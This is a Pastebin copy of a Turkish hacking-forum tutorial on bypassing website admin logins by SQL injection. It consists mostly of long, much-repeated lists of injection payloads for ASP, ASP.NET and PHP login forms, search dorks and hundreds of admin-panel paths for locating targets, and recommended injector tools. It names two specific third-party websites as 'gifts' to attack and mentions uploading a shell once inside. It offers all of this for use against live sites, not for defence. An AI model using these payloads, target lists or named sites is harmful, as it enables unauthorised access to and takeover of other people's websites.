Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Sql Enjeksiyon Admin Authentication Login ByPass Geniş Resimli Videolu Anlatım
- https://www.cyberizm.org/cyberizm-sql-enjeksiyon-admin-authentication-login-bypass-genis-resimli-videolu-anlatim-11517.html
- Merhaba arkadaşlar ben KingSkrupellos. Forumda sevdiğim bir kardeşimin isteği üzerine yazdığım ve birçok kaynaktan alarak düzenlediğim bir dökümanı sizlerle paylaşmak istiyorum.Bu yöntemin bir diğer ismi Sql Injection Authentication Bypass’dır. Bugün size Admin Login Bypass yönteminde kullanılan admin/login.php yada SQL Injection Saldırısı veya Veritabanı saldırısı olarak ta bilinen ve halen birçok site için geçerli olan yönetim panelden SQL Saldırısı yani Login Bypass kodlarını sizlerle paylaşacağım. Genelde Windows sunucularında çalışan Microsoft web uygulamalarının (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir. Microsoft Access ve MsSQL veritabanı kullanan sistemlerde bu saldırı yöntemi çokça yapılmaktadır.PHP tabanlı MySQL veritabanı kullanan siteler içinde geçerlidir bu saldırı. Tabi PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir. Ek olarak Kullanıcının şifre bilgisi MD5 olarak kriptolandığı içinde bu saldırı çeşidi PHP sitelere pek yapılmamaktadır.SQL Injection Saldırısının en basit yöntemi olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici meta kodlarını yazarak panele giriş yapabilmektir. Bu saldırıyı deneme yanılma yolu ile yapabilirsiniz aşağıdaki kodları kullanarak. Yada bazen oluyor ki kullanıcının ismi admin ve şifresi ‘ or ‘1’=’1 ‘nide biz sql encekte ederek yönetici paneline girmiş oluyoruz. Tabi illa yöneticinin ismi admin olacak diye bir şey yok, ya bunu sql encekte ederek öğrenebiliriz yada site üzerinde biraz gezinti yaparak en üst düzey yöneticinin kim olduğunu da görebiliriz.
- [img]http://i.hizliresim.com/o0g9vX.gif[/img]
- Ayrıca konuya uygun bulduğum videolarıda sizinle paylaşıyım.
- [code]http://www.youtube.com/watch?v=ap2aNpO9GJs
- http://www.youtube.com/watch?v=OYpMMaSinlY
- http://www.youtube.com/watch?v=TUMYNBKwOGs
- http://www.youtube.com/watch?v=wDRCTy8tPUA
- http://www.youtube.com/watch?v=J8FOoTcnagM
- http://www.youtube.com/watch?v=16y2gvq__f0
- http://www.youtube.com/watch?v=pr8h-VUDMhE
- http://www.youtube.com/watch?v=QTUIqJUkXqY
- http://www.youtube.com/watch?v=3R0ENxHmRdM
- http://www.youtube.com/watch?v=HI7Ti9SU8es[/code]
- KingSkrupellos Cyberizm.Org
- ASP Siteler için SQL Injection Login Bypass
- [code]
- ' or '1'='1
- ' or 'x'='x
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- 'or'1=1'
- ==
- and 1=1--
- and 1=1
- ' or 'one'='one--
- ' or 'one'='one
- ' and 'one'='one
- ' and 'one'='one--
- 1') and '1'='1--
- admin' --
- admin' #
- admin'/*
- or 1=1--
- or 1=1#
- or 1=1/*
- ) or '1'='1--
- ) or ('1'='1--
- ' or '1'='1
- ' or 'x'='x
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- 'or'1=1'
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- admin') or '1'='1'/*
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- ' or 0=0 --
- admin
- ' or '1'='1
- ' or 1='1
- 1' or 1=1 -- -
- ' or '1'='1
- ' or ' 1=1
- 1' or 1=1 -- -
- ' or ' 1=1
- ' or '1'='1
- ''Or'='Or''
- 1'or'1'='1
- ' or 1=1 or ''='
- " or 1=1 or ""="
- ' OR ''='
- '' OR ''=''
- 'OR''='
- hey' or 1=1–
- ''Or 1 = 1'
- ' or 1=1--
- or 1=1--
- " or 1=1--
- or 1=1--
- ' or 'a'='a
- " or "a"="a
- ') or ('a'='a
- hi") or ("a"="a
- 'hi' or 'x'='x';
- x' or 1=1 or 'x'='y
- \x27\x4F\x52 SELECT *
- \x27\x6F\x72 SELECT *
- 'or select *
- admin'--
- ")) or (("x"))=(("x
- " or ""+"
- admin"or 1=1 or ""="
- admin") or ("1"="1"--[/code]
- ASP.NET(aspx) Siteler için Login Bypass
- [code]anything' OR 'x'='x[/code]
- Ve benim kendim oluşturduğum Administrator Login ByPass yöntemi kodları
- Bunları yönetici panelini bulup Kullanıcı adı ve Şifreyi bu kodlarla iki kez girmektir. Daha sonra admin panelindesiniz.
- [code]
- '-'
- ' '
- '&'
- '^'
- '*'
- ' or ''-'
- ' or '' '
- ' or ''&'
- ' or ''^'
- ' or ''*'
- "-"
- " "
- "&"
- "^"
- "*"
- " or ""-"
- " or "" "
- " or ""&"
- " or ""^"
- " or ""*"
- or true--
- " or true--
- ' or true--
- ") or true--
- ') or true--
- ' or 'x'='x
- ') or ('x')=('x
- ')) or (('x'))=(('x
- " or "x"="x
- ") or ("x")=("x
- ")) or (("x"))=(("x
- ' OR 'a' = 'a
- [/code]
- Kendime ait olup geliştirdiğim Login ByPass yöntemleride var onuda veriyim
- [code]'-'
- ' '
- '&'
- '^'
- '*'
- ' or ''-'
- ' or '' '
- ' or ''&'
- ' or ''^'
- ' or ''*'
- "-"
- " "
- "&"
- "^"
- "*"
- " or ""-"
- " or "" "
- " or ""&"
- " or ""^"
- " or ""*"
- or true--
- " or true--
- ' or true--
- ") or true--
- ') or true--
- ' or 'x'='x
- ') or ('x')=('x
- ')) or (('x'))=(('x
- " or "x"="x
- ") or ("x")=("x
- ")) or (("x"))=(("x
- ''Or'='Or''
- 1'or'1'='1
- ' or 1=1 or ''='
- " or 1=1 or ""="
- ' OR ''='
- '' OR ''=''
- 'OR''='
- hey' or 1=1–
- ''Or 1 = 1'
- ' or 1=1--
- or 1=1--
- " or 1=1--
- or 1=1--
- ' or 'a'='a
- " or "a"="a
- ') or ('a'='a
- hi") or ("a"="a
- 'hi' or 'x'='x';
- x' or 1=1 or 'x'='y
- \x27\x4F\x52 SELECT *
- \x27\x6F\x72 SELECT *
- 'or select *
- admin'--
- ")) or (("x"))=(("x
- " or ""+"
- admin"or 1=1 or ""="
- admin") or ("1"="1"--[/code]
- Örnek Admin Panelleri PHP,HTML,ASP VE ASPX kullanan sistemlerde
- [code]
- /login/web_manage.asp
- /login-admin.asp
- /adminlogin.asp
- /admin/adminLogin.asp
- /admin/login.php
- /admin/login.asp
- /admin/login.aspx
- /admin/login.html
- /admin
- /yonetim
- /panel
- /kontrolpanel
- /administrator
- /giris
- /login
- /superadmin
- /controlpanel
- /yonetici
- /giris.asp
- /yonetim.asp
- /login.asp
- /yonetici.asp
- /panel.asp[/code]
- Not => Dorklar her zaman geliştirilebilir, illa bu dorkları kullanılacak diye bir şey yok.Dorkların önüne inurl : inalltitle : allintext : gibi yazılarla çoğaltabilirsiniz.
- [code]Login Dorks: "inurl:DİYE BURAYA İSTEDİĞİMİZ YAZIYORUZ AŞAĞIDAKİLERDEN" where "DİYE BURAYA İSTEDİĞİMİZ YAZIYORUZ AŞAĞIDAKİLERDEN" = aşağıdaki listeden seçebilirsiniz.
- Mesela şöyle olsun sayın cyberizm üyeleri
- [code]"inurl:admin.asp"
- "inurl:login/admin.asp"
- "inurl:admin/login.asp"
- "inurl:adminlogin.asp"
- "inurl:adminhome.asp"
- "inurl:admin_login.asp"
- "inurl:administratorlogin.asp"
- "inurl:login/administrator.asp"
- "inurl:administrator_login.asp"
- Diğerlerini de siz kendiniz önüne inurl : gibi yazarak çoğaltabilirsiniz.
- adm
- admincp
- admcp
- cp
- modcp
- moderatorcp
- adminare
- admins
- admin1.php
- admin1.html
- admin2.php
- admin2.html
- yonetim.php
- yonetim.html
- yonetici.php
- yonetici.html
- ccms/
- ccms/login.php
- ccms/index.php
- maintenance/
- webmaster/
- adm/
- configuration/
- configure/
- websvn/
- admin/
- admin/account.php
- admin/account.html
- admin/index.php
- admin/index.html
- admin/login.php
- admin/login.html
- admin/home.php
- admin/controlpanel.html
- admin/controlpanel.php
- admin.php
- admin.html
- administrator/
- administrator/index.html
- administrator/index.php
- administrator/login.html
- administrator/login.php
- administrator/account.html
- administrator/account.php
- administrator.php
- administrator.html
- login.php
- login.html
- modelsearch/login.php
- moderator.php
- moderator.html
- moderator/login.php
- moderator/login.html
- moderator/admin.php
- moderator/admin.html
- moderator/
- account.php
- account.html
- admincontrol.php
- admincontrol.html
- adminpanel.php
- adminpanel.html
- admin1.asp
- admin2.asp
- yonetim.asp
- yonetici.asp
- admin/account.asp
- admin/index.asp
- admin/login.asp
- admin/home.asp
- admin.asp
- administrator/index.asp
- administrator/login.asp
- administrator/account.asp
- administrator.asp
- login.asp
- modelsearch/login.asp
- moderator.asp
- moderator/login.asp
- moderator/admin.asp
- account.asp
- controlpanel.asp
- admincontrol.asp
- adminpanel.asp
- fileadmin/
- fileadmin.php
- fileadmin.asp
- fileadmin.html
- administration/
- administration.php
- administration.html
- sysadmin.php
- sysadmin.html
- phpmyadmin/
- myadmin/
- sysadmin.asp
- sysadmin/
- ur-admin.asp
- ur-admin.php
- ur-admin.html
- ur-admin/
- Server.php
- Server.html
- Server.asp
- Server/
- wp-admin/
- administr8.php
- administr8.html
- administr8/
- administr8.asp
- webadmin/
- webadmin.php
- webadmin.asp
- webadmin.html
- administratie/
- admins/
- admins.php
- admins.asp
- admins.html
- administrivia/
- Database_Administration/
- WebAdmin/
- useradmin/
- sysadmins/
- admin1/
- system-administration/
- administrators/
- pgadmin/
- directadmin/
- staradmin/
- ServerAdministrator/
- SysAdmin/
- administer/
- LiveUser_Admin/
- sys-admin/
- typo3/
- panel/
- cpanel/
- cPanel/
- cpanel_file/
- platz_login/
- rcLogin/
- blogindex/
- formslogin/
- autologin/
- support_login/
- meta_login/
- manuallogin/
- simpleLogin/
- loginflat/
- utility_login/
- showlogin/
- memlogin/
- members/
- login-redirect/
- sub-login/
- wp-login/
- login1/
- dir-login/
- login_db/
- xlogin/
- smblogin/
- customer_login/
- UserLogin/
- login-us/
- acct_login/
- admin_area/
- bigadmin/
- project-admins/
- phppgadmin/
- pureadmin/
- sql-admin/
- radmind/
- openvpnadmin/
- wizmysqladmin/
- vadmind/
- ezsqliteadmin/
- hpwebjetadmin/
- newsadmin/
- adminpro/
- Lotus_Domino_Admin/
- bbadmin/
- vmailadmin/
- Indy_admin/
- ccp14admin/
- irc-macadmin/
- banneradmin/
- sshadmin/
- phpldapadmin/
- macadmin/
- administratoraccounts/
- admin4_account/
- admin4_colon/
- radmind-1/
- Super-Admin/
- AdminTools/
- cmsadmin/
- SysAdmin2/
- globes_admin/
- cadmins/
- phpSQLiteAdmin/
- navSiteAdmin/
- server_admin_small/
- logo_sysadmin/
- server/
- database_administration/
- power_user/
- system_administration/
- ss_vms_admin_sm/
- adminarea/
- bb-admin/
- adminLogin/
- panel-administracion/
- instadmin/
- memberadmin/
- administratorlogin/
- admin/admin.php
- admin_area/admin.php
- admin_area/login.php
- siteadmin/login.php
- siteadmin/index.php
- siteadmin/login.html
- admin/admin.html
- admin_area/index.php
- bb-admin/index.php
- bb-admin/login.php
- bb-admin/admin.php
- admin_area/login.html
- admin_area/index.html
- admincp/index.asp
- admincp/login.asp
- admincp/index.html
- webadmin/index.html
- webadmin/admin.html
- webadmin/login.html
- admin/admin_login.html
- admin_login.html
- panel-administracion/login.html
- nsw/admin/login.php
- webadmin/login.php
- admin/admin_login.php
- admin_login.php
- admin_area/admin.html
- pages/admin/admin-login.php
- admin/admin-login.php
- admin-login.php
- bb-admin/index.html
- bb-admin/login.html
- bb-admin/admin.html
- admin/home.html
- pages/admin/admin-login.html
- admin/admin-login.html
- admin-login.html
- admin/adminLogin.html
- adminLogin.html
- home.html
- rcjakar/admin/login.php
- adminarea/index.html
- adminarea/admin.html
- webadmin/index.php
- webadmin/admin.php
- user.html
- modelsearch/login.html
- adminarea/login.html
- panel-administracion/index.html
- panel-administracion/admin.html
- modelsearch/index.html
- modelsearch/admin.html
- admincontrol/login.html
- adm/index.html
- adm.html
- user.php
- panel-administracion/login.php
- wp-login.php
- adminLogin.php
- admin/adminLogin.php
- home.php
- adminarea/index.php
- adminarea/admin.php
- adminarea/login.php
- panel-administracion/index.php
- panel-administracion/admin.php
- modelsearch/index.php
- modelsearch/admin.php
- admincontrol/login.php
- adm/admloginuser.php
- admloginuser.php
- admin2/login.php
- admin2/index.php
- adm/index.php
- adm.php
- affiliate.php
- adm_auth.php
- memberadmin.php
- administratorlogin.php
- admin/admin.asp
- admin_area/admin.asp
- admin_area/login.asp
- admin_area/index.asp
- bb-admin/index.asp
- bb-admin/login.asp
- bb-admin/admin.asp
- pages/admin/admin-login.asp
- admin/admin-login.asp
- admin-login.asp
- user.asp
- webadmin/index.asp
- webadmin/admin.asp
- webadmin/login.asp
- admin/admin_login.asp
- admin_login.asp
- panel-administracion/login.asp
- adminLogin.asp
- admin/adminLogin.asp
- home.asp
- adminarea/index.asp
- adminarea/admin.asp
- adminarea/login.asp
- panel-administracion/index.asp
- panel-administracion/admin.asp
- modelsearch/index.asp
- modelsearch/admin.asp
- admincontrol/login.asp
- adm/admloginuser.asp
- admloginuser.asp
- admin2/login.asp
- admin2/index.asp
- adm/index.asp
- adm.asp
- affiliate.asp
- adm_auth.asp
- memberadmin.asp
- administratorlogin.asp
- siteadmin/login.asp
- siteadmin/index.asp
- ADMIN/
- paneldecontrol/
- login/
- cms/
- admon/
- ADMON/
- administrador/
- ADMIN/login.php
- panelc/
- ADMIN/login.html
- admin.
- login.htm
- login.
- admin/login.htm
- admin/home.
- admin/controlpanel.htm
- admin/cp.
- admin/adminLogin.htm
- admin/admin_login.
- admin/controlpanel.
- admin/admin-login.
- admin-login.
- admin/account.
- admin/admin.
- admin.htm
- adminitem/
- adminitem.
- adminitems/
- adminitems.
- administrator/login.
- administrator.
- administration.
- adminlogin.
- admin_area/admin.
- admin_area/login.
- manager/
- manager.
- letmein/
- letmein.
- superuser/
- superuser.
- access/
- access.
- sysadm/
- sysadm.
- superman/
- supervisor/
- panel.
- control/
- control.
- member/
- member.
- members.
- user/
- user.
- cp/
- uvpanel/
- manage/
- manage.
- management/
- management.
- signin/
- signin.
- log-in/
- log-in.
- log_in/
- log_in.
- sign_in/
- sign_in.
- sign-in/
- sign-in.
- users/
- users.
- accounts/
- accounts.
- bb-admin/login.
- bb-admin/admin.
- administrator/account.
- relogin.htm
- relogin.html
- check.
- relogin.
- blog/wp-login.
- user/admin.
- users/admin.
- registration/
- processlogin.
- checklogin.
- checkuser.
- checkadmin.
- isadmin.
- authenticate.
- authentication.
- auth.
- authuser.
- authadmin.
- cp.
- modelsearch/login.
- moderator.
- controlpanel.
- admincontrol.
- adminpanel.
- fileadmin.
- sysadmin.
- admin1.
- admin1.htm
- admin2.
- yonetim.
- yonetici.
- ur-admin.
- Server.
- administr8.
- webadmin.
- admins.
- adm.
- admin_login.
- panel-administracion/login.
- pages/admin/admin-login.
- pages/admin/
- acceso.
- admincp/login.
- admincp/
- admincontrol/
- affiliate.
- adm_auth.
- memberadmin.
- administratorlogin.
- modules/admin/
- administrators.
- siteadmin/
- siteadmin.
- adminsite/
- kpanel/
- vorod/
- vorod.
- vorud/
- vorud.
- adminpanel/
- PSUser/
- secure/
- webmaster.
- autologin.
- userlogin.
- admin_area.
- cmsadmin.
- security/
- usr/
- root/
- secret/
- admin/login.
- admin/adminLogin.
- moderator/login.
- moderator/admin.
- 0admin/
- 0manager/
- aadmin/
- cgi-bin/login
- login1
- login_admin/
- login_admin
- login_out/
- login_out
- login_user
- loginerror/
- loginok/
- loginsave/
- loginsuper/
- loginsuper
- login
- logout/
- logout
- secrets/
- super1/
- super1
- super_index
- super_login
- supermanager
- superman
- superuser
- supervise/
- supervise/Login
- super[/code]
- Bunun yanında güncel dorkları ve exploitleri takip edebileceğiniz iki siteyi öneriyorum.
- [code]http://www.exploit-db.com/
- http://www.cxsecurity.com/[/code]
- İşte Size 2 site hediyem olsun. Bu sitelerde deneyebilirsiniz. Özellikle forumda sevdiğim kardeşime bir armağan olsun ve sizlere de tabiki Cyberizm.Org üyeleri.
- [code]http://www.sunmarytrust.org/adminlogin.asp
- http://www.preventivecardiology.in/adminlogin.asp
- [/code]
- Bunun yanında Fatcat Sql Injector Tool’u tavsiye ederim. Ayrıntılı bilgiyi bu link üzerinden öğrenebilirsiniz sayın arkadaşlar ve yeni olanlar, alanda zaten uzmanlaşanlar. Ben birşeye karşıyım arkadaş, herşey yeniler için değildir ve biz uzman olanlar içinde lazım oluyor bazen bu toollar yani. Neyse işte programın yada kodun ayrıntılı açıklamasını linkten öğrenebilirsiniz ama ingilizce.
- [code]http://www.chmag.in/article/mar2013/fatcat-v2-auto-sql-injector[/code]
- Ayrıca bu sitede İngilizce olarak resimli benim dediğime benzer resimli olarak anlatılmıştır. Takip edebilirsiniz.
- [code]http://www.kanishkashowto.com/2013/08/09/website-hacking-login-bypass-using-sql-injection-2/[/code]
- Sql Enjeksiyon ile Login ByPass yapılışı
- [code]http://www.sechow.com/bricks/docs/login-1.html[/code]
- Ayrıca güvendiğim sitelerden birisi olan bu siteden BurpSuite programıyla SQL enjekte edip login bypass olup admin paneline dalıp Shell yükleyebilirsiniz.
- [code]https://www.architectingsecurity.com/2012/04/23/pentesting-of-authentication-bypass-via-sql-injection-with-burpsuite-intruder/[/code]
- Bu linklerden de nasıl sql enjekte edilipde login bypass yaptığımız görelim.
- [code]http://priyahackingarticles.blogspot.com.tr/2011/03/bypass-website-login-by-sql-injection.html[/code]
- Not => Çok uzun oldu farkındayım ama olması gerekiyor. Neyse bu kadar anlatım yeter. Yazasıya kadar ellerim yoruldu. Hatta kollarıma ağrı girdi. Üzerine ekleme yapabilirim. Anlamayan olursa pm’le yada konu altında anlamaydığı yeri sorabilir. KingSkrupellos Cyberizm.Org.Lütfen Emeğe Saygı. Hadi görüşürüz bir sonraki makalede.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement